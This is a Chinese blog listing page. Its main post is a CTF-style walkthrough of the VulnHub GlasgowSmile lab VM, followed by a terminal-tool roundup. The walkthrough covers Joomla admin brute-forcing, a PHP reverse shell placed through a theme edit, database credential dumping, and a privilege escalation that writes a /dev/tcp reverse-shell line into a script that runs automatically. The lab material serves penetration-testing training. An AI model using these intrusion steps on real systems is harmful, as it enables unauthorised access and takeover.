VulnHub--GlasgowSmile-v1.1
靶机地址:https://www.vulnhub.com/entry/glasgow-smile-11,491/首先对目标地址进行端口扫描访问80界面来看看插件的内容以及dirb目录扫描的结果,这里发现了一个joomla的cms内容管理系统我们使用joomscan进行目录扫描joomscan --url http://10.10.10.129/joomla版本指纹为 Joomla 3.7.3rc1尝试一顿操作后,都登录不进去,找exp也没有,那么就来爆破后台地址http://10.10.10.129/joomla/administrator普通密码字典爆破失败后我又试着将index.php中的信息用cewl做成字典进行尝试cewl http://10.10.10.129/joomla > dict1.txt继续打开burp抓包,尝试admin进行爆破添加字典没有结果这里要使用这个默认的用户joomla此时的密码就爆破成功了来到后台的管理我们找到已启动的主题这里修改配置文件,为反弹shell的php(kali自带的)之后访问主页就能反弹成功了我们使用FeatherScanwget 10.10.10.128:8000/FeatherScanchmod +x FeatherScan./FeatherScan检查敏感文件/etc/passwd、/etc/shadow都不可写,以及sudo命令都不可以使用通过FeatherScan linux内网扫描工具扫描出来可能存在脏牛提权漏洞尝试一下是失败的,看样子是已经修复了的切换思路,我们来到cms的配置文件可以看到密码就是Gotham(刚刚爆破出来的结果)mysql -ujoomla -pbabyjokeruse joomla_dbuse mysqlselect User,Password from user;找到了root的解密结果为babyjoker切换任意一个用户试试看样子都没有效果,我们换一个数据库看看use batjokeselect * from taskforce;很好找到了这些密码,全部记下来并解密(base64)Bane:baneishereAaron:aaronishereCarnage:carnageisherebuster:busterishereffrob:???AllIHaveAreNegativeThoughts???aunt:auntis the fuck here发现rob用户存在,切换用户成功找到第一个flag这里有一个abner用户的求救文件,看样子是一个加密文件,那么是什么加密呢,从一封信的角度来看,对内容做隐藏让我想到了ROT13https://btsrk.me/,打开这个站点,我们对这个结果进行解密翻译结果如下简单来说就是让我们解密这段base64加密的结果STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==┌──(root㉿kali)-[/data/demo]└─# echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -dI33hope99my0death000makes44more8cents00than0my0life0解密成功后就切换到这个用户找到第二个flag,又有一个提示信息,但是没什么用前面信息收集都搜集的差不多了(FeatherScan),直到我查看到了他的历史命令包含了这样一个东西找到这个文件的位置,还要我们输入密码find / -name .dear_penguins.zip 2>/dev/null下载下来尝试爆破,用kali自带的字典一顿操作没有结果后,我使用了当前用户的密码进行猜测,就成功了abner@glasgowsmile:/var/www/joomla2/administrator/manifests/files$ unzip .dear_penguins.zip -d /tmp<r/manifests/files$ unzip .dear_penguins.zip -d /tmpArchive: .dear_penguins.zip[.dear_penguins.zip] dear_penguins password: I33hope99my0death000makes44more8cents00than0my0life0inflating: /tmp/dear_penguins abner@glasgowsmile:/$ cd /tmpcd tmpabner@glasgowsmile:/tmp$ lslsdear_penguinsabner@glasgowsmile:/tmp$ cat dear_penguinscat dear_penguinsMy dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz就又看到一段密文scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz,再次切换用户试试在penguin用户中看到了一个find命令,且具有suid权限,很多人可能会想到find提权,但是这里可不是,下面看描述1、s(setuid 位):表示该文件在执行时,会以文件所有者(penguin)的权限运行,而不是执行者的权限。2、这里的所有者是penguin,所以find运行时会有penguin的权限(不是root)。我们来看下面这个文件,也是一个可执行文件,查看内容竟然是一个可执行sh脚本开始修改penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#/bin/sh'#/bin/shpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#!/bin/bash' > .trash_oldpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1' >> .trash_oldpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old#!/bin/bash/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ./.trash_old到此提权成功往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录
2025年07月18日
1,283 阅读
0 评论
0 点赞
2025-07-16
12款优秀的终端工具推荐,来看看有没有你喜欢的!
edex-ui开源地址:https://github.com/GitSquared/edex-uieDEX-UI 可以安装在Linux、Windows、MacOS操作系统上面。受电影《创战记》的特效启发,尤其是会议室的场景,给咱带来的灵感超棒!eDEX-UI项目一开始就想搞点特别的,就是“少点艺术味儿,多点实用软件的dx-ui”。不过,这项目虽然看着有未来主义那味儿,但也没光顾着好看,它还很实在地想着得有点功能性,在咱们日常生活中能用得上。说白了,它就是想把科幻小说里的用户体验(UXs)拉到咱普通人身边,让这些高科技玩意儿走进主流生活。Windows Terminal下载地址:微软商店(Microsoft Store)以前在 Windows 系统里,自带的 CMD 工具真是难用得很,模样也不好看,跟 Linux、Mac 那又好看又好用的终端一对比,差距太大了,所以很多人都得额外装第三方工具来替代它。到了 2022 年,微软终于搞出个好东西,推出了一款超厉害的新终端——Windows Terminal。这玩意儿功能超多,有那种透亮的亚克力效果,能开好多标签页,还支持 Unicode 字符和自带的等宽字体,甚至能跑一些 Linux 命令,基本日常用它就足够了。想装的话超简单,打开 Microsoft Store 一搜,点安装就行。PowerShellPowerShell 也是 Windows 的一个终端工具,通过一些配置和工具也能达到美观和实用的效果。参考:谁的能拒绝这样一款终端呢?XShellXShell 是一款超好用的终端工具,特别受欢迎,由 NetSarang 公司开发,自夸说是业界数一数二的 SSH 客户端。官网是https://www.xshell.com/zh/xshell,学生和非商业用途的个人可以免费用,直接去官网下载就行。这公司还有不少配套工具,像 STP、FTP 这些,也都挺好用的。Fluent TerminalFluent Terminal 是Windows平台上的一个超好看的终端模拟器,是用UWP技术开发的,颜值爆表。它在GitHub上是开源的,地址是https://github.com/felixse/FluentTerminal,大家都能去看。同时,你也可以直接在Microsoft Store里搜索它的名字来安装,超级方便。HyperHyper 是个基于 Electron 的跨平台终端应用,配置方便,插件多,界面也很漂亮。不过,Electron 应用普遍存在的问题是资源消耗较大,打开和响应速度不如之前介绍的那些工具快。但它的扩展性很强,有强大的自定义能力,值得尝试。它在 GitHub 上开源,链接是:https://github.com/zeit/hyper。Cmder在 Windows Terminal 推出前,Cmder 可以说是 cmd 的不错替代品,非常受欢迎。它有更友好的界面和更丰富的功能,还内置了 Git,支持部分 Linux 命令。官网是cmder.app,同时也在 GitHub 上开源,链接是:https://github.com/cmderdev/cmder。TabbyTabby(以前叫 Terminus)是一个很厉害的终端模拟器,也是 SSH 和串行客户端,Windows、macOS 和 Linux 系统都能用。它基于 Electron 开发,原生支持 Windows 的 Fluent 背景,设置都是通过 GUI,对用户很友好。官网是https://tabby.sh/,在 GitHub 上开源,链接是:https://github.com/eugeny/tabby。总之,Tabby 是个很值得尝试的终端工具。WindTermWindTerm 是一款专业的跨平台开源终端,支持 SSH、SFTP、Shell、Telnet 和 Serial,用 C 语言编写。它完全免费,可用于商业和非商业用途,没有限制,源代码在 Apache-2.0 许可下提供。感兴趣的朋友可以访问它的GitHub页面:https://github.com/kingToolbox/WindTerm。作者也在博客https://kingtoolbox.github.io/上分享了不少关于 WindTerm 的文章,大家可以去看看。Wrap一款颜值和功能都很在线的终端工具。官网:https://www.warp.dev开源在 Github:https://github.com/warpdotdev/Warpsshx一款可以将你的终端共享的工具。开源在 GitHub:https://github.com/ekzhang/sshxIShelliShell 的官网是https://www.ishell.cc/。它的特点包括:有 AI 助力,不用担心忘记命令。有免费版和付费版,免费版能永久使用。轻量、高性能,界面简洁美观,还自带本地终端。跨平台,支持 Windows、macOS 和 Linux,安卓和 iOS 版本正在开发中。有命令市场,用户可以上传通用脚本,避免重复编写,可直接下载使用。总结工具是刀,怂逼拿再帅的刀也切不动菜!要么沉下心学命令行本质,要么老实蹲回GUI婴儿区喝奶——别™在技术圈当截图行为艺术家!(摔键盘走人) -------deepseek往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具HW 中如何利用 WAF 缺陷进行绕过一个永久的渗透知识库【内网渗透】隐藏通信隧道技术Sqlserver SQL注入,超详细【oscp】WEBDEVELOPER,tcpdump提权红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学
2025年07月16日
1,581 阅读
0 评论
1 点赞
1
...
4
5
6
...
14